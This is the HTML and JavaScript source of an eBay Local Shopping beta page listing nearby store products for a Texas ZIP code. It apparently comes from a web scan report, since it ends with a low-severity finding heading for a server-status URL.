class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325720851249" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325720851249;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AHtMRZjo*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="16651770" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/441/700/200/11441688_15305700_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16651770&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Dead Island for Xbox 360'>Dead Island for Xbox 360</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="5287257" coords="32.868267,-96.775289,10390,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/10390.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/005/783/840/200/5783231_3619840_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=5287257&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='UGG.. Australia 'Sundance' Boot (Women)'>UGG.. Australia 'Sundance' Boot (Women)</a>
</div><div class="price"><span class="price">$249.95</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12115369" coords="33.029941,-96.83243,5404,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5404.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/800/726/200/10800255_14294726_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12115369&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Grier Wine Rack'>Grier Wine Rack</a>
</div><div class="price"><span class="price">$39.95</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19966171" coords="32.869443,-96.773501,13820,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13820.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/015/061/440/200/15061461_20470440_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19966171&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Fossil Handbag, Penelope Wristlet'>Fossil Handbag, Penelope Wristlet</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="9163668" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/325/183/200/10325164_13021183_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=9163668&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Dead Island-Windows'>Dead Island-Windows</a>
</div><div class="price"><span class="price">$39.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="829866" coords="33.008115,-96.70534,3040,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3040.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/000/790/709/200/790588_847709_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=829866&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='CELESTRON ASTROMASTER70 Refractor Telescope'>CELESTRON ASTROMASTER70 Refractor Telescope</a>
</div><div class="price"><span class="price">$124.00</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12108741" coords="32.865543,-96.793953,13363,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13363.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/107/995/200/11107647_14838995_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12108741&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Stackable Wine Rack - Silver'>Stackable Wine Rack - Silver</a>
</div><div class="price"><span class="price">$12.00</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="18993489" coords="32.679624,-97.114002,13361,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13361.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/013/981/913/200/13981435_17242913_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=18993489&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Emerson Refractor Telescope with Tripod'>Emerson Refractor Telescope with Tripod</a>
</div><div class="price"><span class="price">$14.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="891085" coords="32.845595,-96.969233,12845,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/12845.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/000/867/607/200/867294_6287607_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=891085&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Womens UGG.. Classic Short Boot'>Womens UGG.. Classic Short Boot</a>
</div><div class="price"><span class="price">$149.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="17746082" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/774/234/200/11774566_20472234_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=17746082&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Dead Island (XBOX 360)'>Dead Island (XBOX 360)</a>
</div><div class="price"><span class="price">$49.99</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
                           </table>
                       </div>
                   </div>
</div><div class="footer"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab1ed36f1340a03663a54955ff73ced6");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=MIN:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[{"highPrice":null,"highPriceValue":null,"productId":18989800,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=18989800&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/013/976/653/200/13976693_17237653_200.jpg","lowPrice":{"valueInMinorUnits":1699,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":16990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Call It Spring.. 'Geniesse' Handbag","offerIds":"13976693","numLocalStore":1,"lowPriceValue":"$16.99","miloProductOfferModel":[{"merchantTitle":"JCPenney","merchantId":6740,"linkUrl":null,"location":{"merchantName":"JCPenney","latitude":32.605204,"merchantLogoUrl":"http://milo.com/images/stores/6740.jpg","longitude":-96.929276},"RTPalUrl":null,"price":{"valueInMinorUnits":1699,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":16990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6740.png"}],"ratingNode":null},{"highPrice":null,"highPriceValue":null,"productId":18989810,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=18989810&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/013/976/666/200/13976703_17237666_200.jpg","lowPrice":{"valueInMinorUnits":1699,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":16990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Call It Spring.. 'Geniesse' Handbag","offerIds":"13976703","numLocalStore":1,"lowPriceValue":"$16.99","miloProductOfferModel":[{"merchantTitle":"JCPenney","merchantId":6740,"linkUrl":null,"location":{"merchantName":"JCPenney","latitude":32.605204,"merchantLogoUrl":"http://milo.com/images/stores/6740.jpg","longitude":-96.929276},"RTPalUrl":null,"price":{"valueInMinorUnits":1699,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":16990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6740.png"}],"ratingNode":null},{"highPrice":null,"highPriceValue":null,"productId":8276145,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=8276145&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/009/390/580/200/9390671_11239580_200.jpg","lowPrice":{"valueInMinorUnits":7999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":79990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Camryn Metallic Raffia Tote","offerIds":"9390671","numLocalStore":1,"lowPriceValue":"$79.99","miloProductOfferModel":[{"merchantTitle":"Johnston & Murphy","merchantId":12847,"linkUrl":null,"location":{"merchantName":"Johnston & Murphy","latitude":32.770304,"merchantLogoUrl":"http://milo.com/images/stores/12847.jpg","longitude":-96.800606},"RTPalUrl":null,"price":{"valueInMinorUnits":7999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":79990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/12847.png"}],"ratingNode":null}],"title":"","trkId":null,"localLandingLeftNavModel":null,"numOfResults":0,"topProducts":[{"highPrice":null,"highPriceValue":null,"productId":16651770,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":true,"url":"http://www.ebay.com/ctg/mp.html?_flppid=16651770&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/011/441/700/200/11441688_15305700_200.jpg","lowPrice":{"valueInMinorUnits":0,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":0,"negative":false,"zero":true,"currencySymbol":"$","positive":false,"wholeNumberInMajorUnits":true},"reviewCount":0,"title":"Dead Island for Xbox 360","offerIds":"11441688","numLocalStore":1,"lowPriceValue":"$0.00","miloProductOfferModel":[{"merchantTitle":"Gamestop","merchantId":9386,"linkUrl":null,"location":{"merchantName":"Gamestop","latitude":32.91079,"merchantLogoUrl":"http://milo.com/images/stores/9386.jpg","longitude":-96.95881},"RTPalUrl":null,"price":{"valueInMinorUnits":-1,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":-10000,"negative":true,"zero":false,"currencySymbol":"$","positive":false,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png"}],"ratingNode":null}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":10,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a407a-->

2.22. http://local.ebay.com/server-status  previous  next

Summary

Severity:   Low
